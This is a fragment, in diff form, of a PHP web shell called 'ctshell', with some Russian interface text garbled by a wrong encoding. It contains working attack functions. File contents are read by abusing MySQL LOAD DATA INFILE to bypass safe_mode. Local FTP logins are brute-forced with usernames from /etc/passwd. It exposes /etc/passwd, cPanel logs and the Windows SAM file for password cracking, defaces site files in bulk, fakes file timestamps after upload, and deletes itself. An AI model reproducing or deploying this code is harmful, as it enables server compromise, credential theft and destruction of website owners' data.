htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+ if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+ if ($sql_act == "newtpl")
+ {
+  echo "<b>";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+ }
+ else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+}
+elseif ($sql_act == "dump")
+{
+ $set = array();
+ $set["sock"] = $sql_sock;
+ $set["db"] = $sql_db;
+ $dump_out = "print";
+ if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+ elseif ($dump_out == "download")
+ {
+  @ob_clean();
+  header("Content-type: ctshell");
+  header("Content-disposition: attachment; filename=\"".$f."\";"); 
+  $set["print"] = 1;
+  $set["nl2br"] = 1;
+ }
+ $set["file"] = $dump_file;
+ $set["add_drop"] = true;
+ $ret = mysql_dump($set);
+ if ($dump_out == "download") {exit;}
+}
+else
+{
+ $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+ echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
+ echo "<tr>";
+ echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
+ echo "<td><center><b>Table</b></center></td>";
+ echo "<td><b>Rows</b></td>";
+ echo "<td><b>Type</b></td>";
+ echo "<td><b>Created</b></td>";
+ echo "<td><b>Modified</b></td>";
+ echo "<td><b>Size</b></td>";
+ echo "<td><b>Action</b></td>";
+ echo "</tr>";
+ $i = 0;
+ $tsize = $trows = 0;
+ while ($row = mysql_fetch_array($result, MYSQL_NUM))
+ {
+  $tsize += $row["5"];
+  $trows += $row["5"];
+  $size = view_size($row["5"]);
+  echo "<tr>";
+  echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
+  echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
+  echo "<td>".$row[3]."</td>";
+  echo "<td>".$row[1]."</td>";
+  echo "<td>".$row[10]."</td>";
+  echo "<td>".$row[11]."</td>";
+  echo "<td>".$size."</td>";
+  echo "<td>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
+<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
+</td>";
+  echo "</tr>";
+  $i++;
+ }
+ echo "<tr bgcolor=\"000000\">";
+ echo "<td><center><b>»</b></center></td>";
+ echo "<td><center><b>".$i." table(s)</b></center></td>";
+ echo "<td><b>".$trows."</b></td>";
+ echo "<td>".$row[1]."</td>";
+ echo "<td>".$row[10]."</td>";
+ echo "<td>".$row[11]."</td>";
+ echo "<td><b>".view_size($tsize)."</b></td>";
+ echo "<td></td>";
+ echo "</tr>";
+ echo "</table><hr size=\"1\" noshade><img src=\"".$sul."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
+<option>With selected:</option>
+<option value=\"drop\" >Drop</option>
+<option value=\"empty\" >Empty</option>
+<option value=\"chk\">Check table</option>
+<option value=\"Optimize table\">Optimize table</option>
+<option value=\"Repair table\">Repair table</option>
+<option value=\"Analyze table\">Analyze table</option>
+</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
+ mysql_free_result($result);
+}
+  }
+  }
+  else
+  {
+$acts = array("","newdb","serverstat","servervars","processes","getfile");
+if (in_array($sql_act,$acts))
+{
+ ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Ñîçäàéòå íîâûé Áàçó:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Ñîçäàòü"></form></td><td width="30%" height="1"><b>Ïğèñìîòğåòü Ôàéëà:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Âçÿòü"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+}
+if (!empty($sql_act))
+{
+ echo "<hr size=\"1\" noshade>";
+ if ($sql_act == "newdb")
+ {
+  echo "<b>";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+  else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+ }
+ if ($sql_act == "serverstatus")
+ {
+  $result = mysql_query("SHOW STATUS", $sql_sock); 
+  echo "<center><b>Server-status variables:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+  echo "</table></center>";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "servervars")
+ {
+  $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+  echo "<center><b>Server variables:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+  echo "</table>";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "processes")
+ {
+  if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+  $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+  echo "<center><b>Ïğîöåññû:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+  echo "</table>";
+  mysql_free_result($result);
+ }
+ elseif (($sql_act == "getfile"))
+ {
+  if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+  else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+  else
+  {
+for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+$f = ""; 
+while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
+if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
+else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
+  }
+  mysql_free_result($result);
+  if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+  }
+ }
+}
+  }
+ }
+ echo "</tr></table></table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
+ echo "<br><br>";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if ($win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+if ($fqb_onlywithsh)
+{
+ if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
+ else {$true = true;}
+}
+else {$true = true;}
+if ($true)
+{
+ $sock = @ftp_connect($host,$port,$timeout);
+ if (@ftp_login($sock,$login,$pass))
+ {
+  echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+  ob_flush();
+  return true;
+ }
+}
+  }
+  if (!empty($submit))
+  {
+if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+$fp = fopen("/etc/passwd","r");
+if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+else
+{
+ ob_flush();
+ $i = $success = 0;
+ $ftpquick_st = getmicrotime();
+ while(!feof($fp))
+ { 
+  $str = explode(":",fgets($fp,2048));
+  if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+  {
+$success++;
+  }
+  if ($i > $fqb_lenght) {break;}
+  $i++;
+ } 
+ if ($success == 0) {echo "No success. connections!";}
+ $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+ echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
+}
+  }
+  else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
+ }
+}
+if ($act == "lsa")
+{
+ echo "<center><b>Èíôîğìàöèÿ áåçîïàñíîñòè ñåğâåğà:</b></center>";
+ echo "<b>Ïğîãğàììíîå îáåñïå÷åíèå:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
+ echo "<b>Áåçîïàñíîñòü: ".$hsafemode."</b><br>";
+ echo "<b>Îòêğûòûé îñíîâíîé äèğåêòîğ: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+if ($nixpasswd == 1) {$nixpasswd = 0;}
+$num = $nixpasswd + $nixpwdperpage;
+echo "<b>*nix /etc/passwd:</b><br>";
+$i = $nixpasswd;
+while ($i < $num)
+{
+ $uid = posix_getpwuid($i);
+ if ($uid) {echo join(":",$uid)."<br>";}
+ $i++;
+}
+  }
+  else {echo "<br><a href=\"".$sul."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">Âû ìîæåòå âçëîìàòü winnt ïàğîëè. <a href=\"".$sul."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Ñêà÷àòü</b></u></a>, c èñïîëüçîâàíèå lcp.crack+.</font></b><br>";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else
+ {
+  echo "<b>File-System buffer</b><br><br>";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$sul."\"><u><b>NO</b></u></a>";}
+  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$sul."act=selfremove&submit=1';\"><u>YES</u></a>";
+  shuffle($v);
+  $v = join("&nbsp;&nbsp;&nbsp;",$v);
+  echo "<b>Ñàìîóäàëèòü: ".__FILE__." <br>Âû óâåğåííû?</b><center>".$v."</center>";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+"name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+"text"=>$text, "text_regexp"=>$text_regxp,
+"text_wwo"=>$deface_text_wwo,
+"text_cs"=>$deface_text_cs,
+"text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {ctfsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+
+ }
+ echo "<form method=\"POST\">";
+ if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
+ echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
+<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
+<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
+<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
+<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+"name"=>$search_name, "name_regexp"=>$search_name_regexp,
+"text"=>$search_text, "text_regexp"=>$search_text_regxp,
+"text_wwo"=>$search_text_wwo,
+"text_cs"=>$search_text_cs,
+"text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+ctfsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+$ls_arr = $found;
+$disp_fullpath = true;
+$act = $dspact = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $perms = fileperms($d.$f);
+ if (!$perms) {echo "Can't get current mode.";}
+ elseif ($submit)
+ {
+  if (!isset($owner[0])) {$owner[0] = 0;}
+  if (!isset($owner[1])) {$owner[1] = 0; }
+  if (!isset($owner[2])) {$owner[2] = 0;}
+  if (!isset($group[0])) {$group[0] = 0;}
+  if (!isset($group[1])) {$group[1] = 0;}
+  if (!isset($group[2])) {$group[2] = 0;}
+  if (!isset($world[0])) {$world[0] = 0;}
+  if (!isset($world[1])) {$world[1] = 0;}
+  if (!isset($world[2])) {$world[2] = 0;}
+  $sum_owner = $owner[0] + $owner[1] + $owner[2];
+  $sum_group = $group[0] + $group[1] + $group[2];
+  $sum_world = $world[0] + $world[1] + $world[2];
+  $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
+  $ret = @chmod($d.$f, $sum_chmod);
+  if ($ret) {$act = "ls";}
+  else {echo "<b>Èçìåíåíèå Àòğèáóò Ôàéëà (".$d.$f.")</b>: Îøèáêà<br>";}
+ }
+ else
+ {
+  echo "<center><b>Èçìåíåíèå Àòğèáóò Ôàéëà</b><br>";
+  $perms = view_perms(fileperms($d.$f));
+  $length = strlen($perms);
+  $owner_r = $owner_w = $owner_x =
+  $group_r = $group_w = $group_x = 
+  $world_r = $world_w = $group_x = "";
+
+  if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
+  if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
+  if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
+  if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
+ if ($perms[9] == "x") {$world_x = " checked";}
+  echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
+<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
+<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
+<table class=table1><tr><td class=td2><table class=table1 align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td class=td2><b>Owner</b><br><br>
+<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
+<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td class=td2><b>Group</b><br><br>
+<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
+<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
+<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
+<td class=td2><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
+<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
+<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
+</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Ñîõğàíèòü\"></td></tr></table></FORM></center>";
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+else {$destin = $userfilename;}
+if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Îøèáêà, çàãğóæàşùàÿ ôàéë ".$uploadfile[name]." (íå ìîæåò ñêîïèğîâàòü \"".$uploadfile[tmp_name]."\" íà \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+else
+{
+ $destin = explode("/",$destin);
+ $destin = $destin[count($destin)-1];
+ if (empty($destin))
+ {
+  $i = 0;
+  $b = "";
+  while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+}
+if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+else
+{
+ $st = getmicrotime();
+ $content = @file_get_contents($uploadurl);
+ $dt = round(getmicrotime()-$st,4);
+ if (!$content) {$uploadmess .=  "Íå ìîæåò çàãğóçèòü ôàéë!<br>";}
+ else
+ {
+  if ($filestealth) {$stat = stat($uploadpath.$destin);}
+  $fp = fopen($uploadpath.$destin,"w");
+  if (!$fp) {$uploadmess .= "Îøèáêà, ïèøóùàÿ ôàéëó ".htmlspecialchars($destin)."!<br>";}
+  else
+  {
+fwrite($fp,$content,strlen($content));
+fclose($fp);
+if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+  }
+ }
+}
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>Çàãğóçêà Ôàéëà:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$sul."act=upload&d=".urlencode($d)."\" method=\"POST\">
+Ëîêàëüíûé ôàéë: <br><input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;èëè<br>
+Çàãğóçèòü èç URL: <br><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Ñîõğàíèòü ıòîò ôàéëü â ïàïêó: <br><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+Èìÿ Ôàéëà: <br><input name=uploadfilename size=25>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;Êîíâåğòèğîâàòü èìÿ ôàéëà<br><br>
+<input type=\"submit\" name=\"submit\" value=\"Çàãğóçèòü\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ }
+ $act = "ls";
+}
+if ($act == "onedelete")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($f);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ $act = "ls";
+}
+if ($act == "onedeleted")
+{
+ $delerr = "";
+  $result = false;
+  $result = fs_rmobj($d+'/'+$f);
+  if (!$result) {$delerr .= "Íå ìîæåò óäàëèòü ".htmlspecialchars($f)."<br>";}
+  if (!empty($delerr)) {echo "<b>Óäàëåíèå ñ îøèáêàìè:</b><br>".$delerr;}
+ $act = "ls";
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $data = $deface_html;
+  if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
+  $data = str_replace("%%%filename%%%",basename($v),$data);
+  $data = str_replace("%%%filepath%%%",$v,$data);
+  $fp = @fopen($v,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+  if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
